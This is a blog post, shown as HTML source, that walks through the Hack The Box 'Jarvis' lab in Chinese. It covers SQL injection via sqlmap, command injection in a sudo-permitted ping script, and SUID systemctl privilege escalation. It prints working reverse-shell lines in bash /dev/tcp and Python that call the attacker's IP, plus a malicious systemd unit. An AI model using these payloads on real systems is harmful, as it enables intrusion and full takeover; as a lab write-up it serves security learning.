-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathHTB-linux-Jarvis.html
More file actions
398 lines (280 loc) · 32.4 KB
/
HTB-linux-Jarvis.html
File metadata and controls
398 lines (280 loc) · 32.4 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">
<link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
<link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
<link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
<link rel="mask-icon" href="/images/logo.svg" color="#222">
<link rel="stylesheet" href="/css/main.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css" integrity="sha256-dABdfBfUoC8vJUBOwGVdm8L9qlMWaHTIfXt+7GnZCIo=" crossorigin="anonymous">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancyapps-ui/5.0.36/fancybox/fancybox.css" integrity="sha256-zM8WXtG4eUn7dKKNMTuoWZub++VnSfaOpA/8PJfvTBo=" crossorigin="anonymous">
<script class="next-config" data-name="main" type="application/json">{"hostname":"owefsad.github.io","root":"/","images":"/images","scheme":"Mist","darkmode":false,"version":"8.23.1","exturl":false,"sidebar":{"position":"right","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"codeblock":{"theme":{"light":"default","dark":"stackoverflow-dark"},"prism":{"light":"prism","dark":"prism-dark"},"copy_button":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"language":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}}</script><script src="/js/config.js" defer></script>
<meta name="description" content="简介sql注入获取webshell,sudoers搭配操作系统命令执行获取pepper reverse shell,suid创建systemd服务提权。 靶机状态: rooted.">
<meta property="og:type" content="article">
<meta property="og:title" content="HTB Linux Jarvis">
<meta property="og:url" content="https://owefsad.github.io/HTB-linux-Jarvis.html">
<meta property="og:site_name" content="owefsad">
<meta property="og:description" content="简介sql注入获取webshell,sudoers搭配操作系统命令执行获取pepper reverse shell,suid创建systemd服务提权。 靶机状态: rooted.">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://owefsad.github.io/HTB-linux-Jarvis/Jarvis_mind.png">
<meta property="article:published_time" content="2019-08-12T06:02:33.000Z">
<meta property="article:modified_time" content="2025-06-21T08:45:38.093Z">
<meta property="article:author" content="owefsad">
<meta property="article:tag" content="suid">
<meta property="article:tag" content="sql注入">
<meta property="article:tag" content="OS命令执行">
<meta property="article:tag" content="sudoers">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://owefsad.github.io/HTB-linux-Jarvis/Jarvis_mind.png">
<link rel="canonical" href="https://owefsad.github.io/HTB-linux-Jarvis.html">
<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"https://owefsad.github.io/HTB-linux-Jarvis.html","path":"HTB-linux-Jarvis.html","title":"HTB Linux Jarvis"}</script>
<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>HTB Linux Jarvis | owefsad</title>
<script src="/js/third-party/analytics/baidu-analytics.js" defer></script>
<script async src="https://hm.baidu.com/hm.js?2a72b138b6ef81ae123fcd18e91fa843"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/fancyapps-ui/5.0.36/fancybox/fancybox.umd.js" integrity="sha256-hiUEBwFEpLF6DlB8sGXlKo4kPZ46Ui4qGpd0vrVkOm4=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>
<script src="/js/third-party/fancybox.js" defer></script>
<noscript>
<link rel="stylesheet" href="/css/noscript.css">
</noscript>
</head>
<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
<div class="headband"></div>
<main class="main">
<div class="column">
<header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
<div class="site-nav-toggle">
<div class="toggle" aria-label="Toggle navigation bar" role="button">
<span class="toggle-line"></span>
<span class="toggle-line"></span>
<span class="toggle-line"></span>
</div>
</div>
<div class="site-meta">
<a href="/" class="brand" rel="start">
<i class="logo-line"></i>
<p class="site-title">owefsad</p>
<i class="logo-line"></i>
</a>
<p class="site-subtitle" itemprop="description">owefsad page</p>
</div>
<div class="site-nav-right">
<div class="toggle popup-trigger" aria-label="Search" role="button">
</div>
</div>
</div>
<nav class="site-nav">
<ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li><li class="menu-item menu-item-resume"><a href="/resume/" rel="section"><i class="fa fa-user fa-fw"></i>resume</a></li>
</ul>
</nav>
</header>
<aside class="sidebar">
<div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
<ul class="sidebar-nav">
<li class="sidebar-nav-toc">
Table of Contents
</li>
<li class="sidebar-nav-overview">
Overview
</li>
</ul>
<div class="sidebar-panel-container">
<!--noindex-->
<div class="post-toc-wrap sidebar-panel">
<div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%96%87%E7%AB%A0%E7%9B%AE%E5%BD%95"><span class="nav-number">1.</span> <span class="nav-text">文章目录</span></a></li></ol></div>
</div>
<!--/noindex-->
<div class="site-overview-wrap sidebar-panel">
<div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
<p class="site-author-name" itemprop="name">owefsad</p>
<div class="site-description" itemprop="description">分享安全、AI漏洞分析、漏洞研究、技术分享、开源工具</div>
</div>
<div class="site-state-wrap animated">
<nav class="site-state">
<div class="site-state-item site-state-posts">
<a href="/archives/">
<span class="site-state-item-count">93</span>
<span class="site-state-item-name">posts</span>
</a>
</div>
<div class="site-state-item site-state-categories">
<a href="/categories/">
<span class="site-state-item-count">6</span>
<span class="site-state-item-name">categories</span></a>
</div>
<div class="site-state-item site-state-tags">
<a href="/tags/">
<span class="site-state-item-count">173</span>
<span class="site-state-item-name">tags</span></a>
</div>
</nav>
</div>
<div class="links-of-author animated">
<span class="links-of-author-item">
<a href="https://github.com/exexute" title="GitHub → https://github.com/exexute" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
</span>
<span class="links-of-author-item">
<a href="mailto:1547147759@gmail.com" title="E-Mail → mailto:1547147759@gmail.com" rel="noopener me" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
</span>
</div>
</div>
</div>
</div>
</aside>
</div>
<div class="main-inner post posts-expand">
<div class="post-block">
<article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
<link itemprop="mainEntityOfPage" href="https://owefsad.github.io/HTB-linux-Jarvis.html">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.gif">
<meta itemprop="name" content="owefsad">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="owefsad">
<meta itemprop="description" content="分享安全、AI漏洞分析、漏洞研究、技术分享、开源工具">
</span>
<span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
<meta itemprop="name" content="HTB Linux Jarvis | owefsad">
<meta itemprop="description" content="">
</span>
<header class="post-header">
<h1 class="post-title" itemprop="name headline">
HTB Linux Jarvis<a href="https://github.com/owefsad/blog/tree/main/source/_posts/HTB-linux-Jarvis.md" class="post-edit-link" title="Edit this post" rel="noopener" target="_blank"><i class="fa fa-pen-nib"></i></a>
</h1>
<div class="post-meta-container">
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">Posted on</span>
<time title="Created: 2019-08-12 14:02:33" itemprop="dateCreated datePublished" datetime="2019-08-12T14:02:33+08:00">2019-08-12</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-folder"></i>
</span>
<span class="post-meta-item-text">In</span>
<span itemprop="about" itemscope itemtype="http://schema.org/Thing">
<a href="/categories/CTF/" itemprop="url" rel="index"><span itemprop="name">CTF</span></a>
</span>
</span>
</div>
</div>
</header>
<div class="post-body" itemprop="articleBody"><p>简介<br>sql注入获取webshell,sudoers搭配操作系统命令执行获取pepper reverse shell,suid创建systemd服务提权。</p>
<p>靶机状态: rooted.</p>
<p><img src="/HTB-linux-Jarvis/Jarvis_mind.png" alt="简介"></p>
<span id="more"></span>
<h2 id="文章目录"><a href="#文章目录" class="headerlink" title="文章目录"></a>文章目录</h2><ul>
<li>nmap && sqlmap</li>
<li>LinEnum && 命令执行</li>
<li>suid && systemd</li>
</ul>
<blockquote>
<p>nmap && sqlmap</p>
</blockquote>
<p>端口扫面发现22端口OpenSSH 7.4p1,80端口Apache httpd 2.4.25;WEB中间件不存在cve, 直接扫目录,看是否存在敏感信息,同时开始配置host, 查看WEB页面。</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">$ nmap -sC -sV -oA Javris/nmap/Jarvis 10.10.10.143</span><br><span class="line"><span class="comment"># Nmap 7.70 scan initiated Tue Jul 9 22:02:25 2019 as: nmap -sC -sV -oA Jarvis/nmap/Jarvis 10.10.10.143</span></span><br><span class="line">Nmap scan report <span class="keyword">for</span> 10.10.10.143</span><br><span class="line">Host is up (0.32s latency).</span><br><span class="line">Not shown: 998 closed ports</span><br><span class="line">PORT STATE SERVICE VERSION</span><br><span class="line">22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)</span><br><span class="line">| ssh-hostkey:</span><br><span class="line">| 2048 03:f3:4e:22:36:3e:3b:81:30:79:ed:49:67:65:16:67 (RSA)</span><br><span class="line">| 256 25:d8:08:a8:4d:6d:e8:d2:f8:43:4a:2c:20:c8:5a:f6 (ECDSA)</span><br><span class="line">|_ 256 77:d4:ae:1f:b0:be:15:1f:f8:<span class="built_in">cd</span>:c8:15:3a:c3:69:e1 (ED25519)</span><br><span class="line">80/tcp open http Apache httpd 2.4.25 ((Debian))</span><br><span class="line">| http-cookie-flags:</span><br><span class="line">| /:</span><br><span class="line">| PHPSESSID:</span><br><span class="line">|_ httponly flag not <span class="built_in">set</span></span><br><span class="line">|_http-title: Stark Hotel</span><br><span class="line">Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</span><br><span class="line"></span><br><span class="line">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line"><span class="comment"># Nmap done at Tue Jul 9 22:26:03 2019 -- 1 IP address (1 host up) scanned in 1418.35 seconds</span></span><br></pre></td></tr></table></figure>
<p>然后在 <a target="_blank" rel="noopener" href="http://10.10.10.143/room.php?cod=2">http://10.10.10.143/room.php?cod=2</a> 页面发现sql注入,sqlmap上去跑库、表、用户、读flag、获取os-shell,最后发现获取os-shell是正解。</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># payload: cod=8 AND (SELECT 7865 FROM (SELECT(SLEEP(5)))SzuN)</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 查看主机名</span></span><br><span class="line">$ sqlmap -u http://10.10.10.143/room.php\?cod\=2 -v3 --hostname --batch</span><br><span class="line">jarvis</span><br><span class="line"></span><br><span class="line">$ sqlmap -u http://10.10.10.143/room.php\?cod\=2 -v3 --os-shell --batch</span><br><span class="line">os-shell> /bin/bash -i >& /dev/tcp/10.10.15.234/4444 0>&1</span><br></pre></td></tr></table></figure>
<p>进入webshell之后收集信息,发现php配置文件, 尝试用配置中的用户密码登陆ssh,无果。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="variable">$connection</span>=<span class="keyword">new</span> <span class="title function_ invoke__">mysqli</span>(<span class="string">'127.0.0.1'</span>,<span class="string">'DBadmin'</span>,<span class="string">'imissyou'</span>,<span class="string">'hotel'</span>);</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<blockquote>
<p>LinEnum && 命令执行</p>
</blockquote>
<p><strong>www-data</strong> 信息收集未发现有用内容,运行LinEnum.sh收集信息发现www-data用户的sudoers配置</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">www-data@jarvis:/var/www/Admin-Utilities$ <span class="built_in">sudo</span> -l</span><br><span class="line"><span class="built_in">sudo</span> -l</span><br><span class="line">Matching Defaults entries <span class="keyword">for</span> www-data on jarvis:</span><br><span class="line"> env_reset, mail_badpass,</span><br><span class="line"> secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin</span><br><span class="line"></span><br><span class="line">User www-data may run the following commands on jarvis:</span><br><span class="line"> (pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py</span><br></pre></td></tr></table></figure>
<p>查看”/var/www/Admin-Utilities/simpler.py”源码, 关键代码如下:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">exec_ping</span>():</span><br><span class="line"> forbidden = [<span class="string">'&'</span>, <span class="string">';'</span>, <span class="string">'-'</span>, <span class="string">'`'</span>, <span class="string">'||'</span>, <span class="string">'|'</span>]</span><br><span class="line"> command = <span class="built_in">input</span>(<span class="string">'Enter an IP: '</span>)</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> forbidden:</span><br><span class="line"> <span class="keyword">if</span> i <span class="keyword">in</span> command:</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">'Got you'</span>)</span><br><span class="line"> exit()</span><br><span class="line"> os.system(<span class="string">'ping '</span> + command)</span><br></pre></td></tr></table></figure>
<p>exec_ping中处理命令执行时,忽略了对$符号的检测,因此利用$()可以读取user.txt和获取反弹shell</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line">www-data@jarvis:/var/www/html$ <span class="built_in">sudo</span> -u pepper /var/www/Admin-Utilities/simpler.py -p</span><br><span class="line"><<span class="keyword">do</span> -u pepper /var/www/Admin-Utilities/simpler.py -p</span><br><span class="line">***********************************************</span><br><span class="line"> _ _</span><br><span class="line"> ___(_)_ __ ___ _ __ | | ___ _ __ _ __ _ _</span><br><span class="line">/ __| | <span class="string">'_ ` _ \| '</span>_ \| |/ _ \ <span class="string">'__| '</span>_ \| | | |</span><br><span class="line">\__ \ | | | | | | |_) | | __/ |_ | |_) | |_| |</span><br><span class="line">|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |</span><br><span class="line"> |_| |_| |___/</span><br><span class="line"> @ironhackers.es</span><br><span class="line"></span><br><span class="line">***********************************************</span><br><span class="line"></span><br><span class="line">Enter an IP: $(<span class="built_in">cat</span> /home/pepper/user.txt)</span><br><span class="line">ping: 2afa36c4f05b37b34259c93551f5c44f: Temporary failure <span class="keyword">in</span> name resolution</span><br><span class="line"></span><br><span class="line"><span class="comment"># 编写反弹shell</span></span><br><span class="line">python -c <span class="string">'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.187",4447));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 执行反弹shell</span></span><br><span class="line">www-data@jarvis:/tmp$ <span class="built_in">sudo</span> -u pepper /var/www/Admin-Utilities/simpler.py -p</span><br><span class="line"><span class="built_in">sudo</span> -u pepper /var/www/Admin-Utilities/simpler.py -p</span><br><span class="line">***********************************************</span><br><span class="line"> _ _</span><br><span class="line"> ___(_)_ __ ___ _ __ | | ___ _ __ _ __ _ _</span><br><span class="line">/ __| | <span class="string">'_ ` _ \| '</span>_ \| |/ _ \ <span class="string">'__| '</span>_ \| | | |</span><br><span class="line">\__ \ | | | | | | |_) | | __/ |_ | |_) | |_| |</span><br><span class="line">|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |</span><br><span class="line"> |_| |_| |___/</span><br><span class="line"> @ironhackers.es</span><br><span class="line"></span><br><span class="line">***********************************************</span><br><span class="line"></span><br><span class="line">Enter an IP: $(/bin/bash /tmp/owef.sh)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 攻击机器运行nc监听端口,获取反弹shell</span></span><br><span class="line">nc -lv 4447</span><br><span class="line">bash: cannot <span class="built_in">set</span> terminal process group (599): Inappropriate ioctl <span class="keyword">for</span> device</span><br><span class="line">bash: no job control <span class="keyword">in</span> this shell</span><br><span class="line">pepper@jarvis:/tmp$ <span class="built_in">id</span></span><br><span class="line"><span class="built_in">id</span></span><br><span class="line">uid=1000(pepper) gid=1000(pepper) <span class="built_in">groups</span>=1000(pepper)</span><br></pre></td></tr></table></figure>
<blockquote>
<p>suid && systemd</p>
</blockquote>
<p>获取到pepper的shell后,运行LinEnum.sh收集信息,发现/bin/systemctl被设置了suid,在<a target="_blank" rel="noopener" href="https://gtfobins.github.io/gtfobins/systemctl/">GTFObins</a>中查看利用方法</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> sh -c <span class="string">'cp $(which systemctl) .; chmod +s ./systemctl'</span></span><br><span class="line"></span><br><span class="line">TF=$(<span class="built_in">mktemp</span>).service</span><br><span class="line"><span class="built_in">echo</span> <span class="string">'[Service]</span></span><br><span class="line"><span class="string">Type=oneshot</span></span><br><span class="line"><span class="string">ExecStart=/bin/sh -c "id > /tmp/output"</span></span><br><span class="line"><span class="string">[Install]</span></span><br><span class="line"><span class="string">WantedBy=multi-user.target'</span> > <span class="variable">$TF</span></span><br><span class="line">./systemctl <span class="built_in">link</span> <span class="variable">$TF</span></span><br><span class="line">./systemctl <span class="built_in">enable</span> --now <span class="variable">$TF</span></span><br></pre></td></tr></table></figure>
<p><strong>pepper</strong> 因此编写自己的提权服务,通过systemctl运行安装、运行提权服务获取root权限</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 执行编写owef.service</span></span><br><span class="line">[Unit]</span><br><span class="line">Description=Authentication service <span class="keyword">for</span> virtual machines hosted on VMware</span><br><span class="line">Documentation=http://github.com/vmware/open-vm-tools</span><br><span class="line"></span><br><span class="line">[Service]</span><br><span class="line">ExecStart=/bin/bash /home/pepper/owef.sh</span><br><span class="line"></span><br><span class="line">[Install]</span><br><span class="line">WantedBy=multi-user.target</span><br><span class="line"></span><br><span class="line"><span class="comment"># 利用systemctl创建服务</span></span><br><span class="line">$ /bin/systemctl <span class="built_in">link</span> /home/pepper/owef.service</span><br><span class="line">$ /bin/systemctl <span class="built_in">enable</span> --now owef.service</span><br><span class="line"></span><br><span class="line">$ nc -lv 4448</span><br><span class="line">bash: cannot <span class="built_in">set</span> terminal process group (11105): Inappropriate ioctl <span class="keyword">for</span> device</span><br><span class="line">bash: no job control <span class="keyword">in</span> this shell</span><br><span class="line">root@jarvis:/# <span class="built_in">cd</span></span><br><span class="line"><span class="built_in">cd</span></span><br><span class="line">bash: <span class="built_in">cd</span>: HOME not <span class="built_in">set</span></span><br><span class="line">root@jarvis:/# <span class="built_in">cd</span> /root</span><br><span class="line"><span class="built_in">cd</span> /root</span><br><span class="line">root@jarvis:/root# <span class="built_in">cat</span> root.txt</span><br><span class="line"><span class="built_in">cat</span> root.txt</span><br><span class="line">d41d8cd98f00b204e9800998ecf84271</span><br><span class="line">root@jarvis:/root#</span><br></pre></td></tr></table></figure>
</div>
<footer class="post-footer">
<div class="followme">
<span>Welcome to my other publishing channels</span>
<div class="social-list">
<div class="social-item">
<span class="social-link">
<span class="icon">
<i class="fab fa-weixin"></i>
</span>
<span class="label">WeChat</span>
</span>
<img class="social-item-img" src="/uploads/wechat-qcode.jpg">
</div>
<div class="social-item">
<a target="_blank" class="social-link" href="/uploads/avatar.gif">
<span class="icon">
<i class="fab fa-qq"></i>
</span>
<span class="label">QQ</span>
</a>
</div>
</div>
</div>
<div class="post-tags">
<a href="/tags/suid/" rel="tag"># suid</a>
<a href="/tags/sql%E6%B3%A8%E5%85%A5/" rel="tag"># sql注入</a>
<a href="/tags/OS%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/" rel="tag"># OS命令执行</a>
<a href="/tags/sudoers/" rel="tag"># sudoers</a>
</div>
<div class="post-nav">
<div class="post-nav-item">
<a href="/HTB-linux-LuKe.html" rel="prev" title="HTB Linux LuKe">
<i class="fa fa-angle-left"></i> HTB Linux LuKe
</a>
</div>
<div class="post-nav-item">
<a href="/NoSql-Injection-Patrick-Spiegel.html" rel="next" title="NoSql Injection - Patrick Spiegel(翻译)">
NoSql Injection - Patrick Spiegel(翻译) <i class="fa fa-angle-right"></i>
</a>
</div>
</div>
</footer>
</article>
</div>
</div>
</main>
<footer class="footer">
<div class="footer-inner">
<div class="copyright">
© 2017 –
<span itemprop="copyrightYear">2025</span>
<span class="with-love">
<i class="fa fa-heart"></i>
</span>
<span class="author" itemprop="copyrightHolder">owefsad</span>
</div>
</div>
</footer>
<div class="toggle sidebar-toggle" role="button">
<span class="toggle-line"></span>
<span class="toggle-line"></span>
<span class="toggle-line"></span>
</div>
<div class="sidebar-dimmer"></div>
<div class="back-to-top" role="button" aria-label="Back to top">
<i class="fa fa-arrow-up fa-lg"></i>
<span>0%</span>
</div>
<a href="https://github.com/exexute" class="github-corner" title="Follow me on GitHub" aria-label="Follow me on GitHub" rel="noopener" target="_blank"><svg width="80" height="80" viewBox="0 0 250 250" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a>
<noscript>
<div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>
</body>
</html>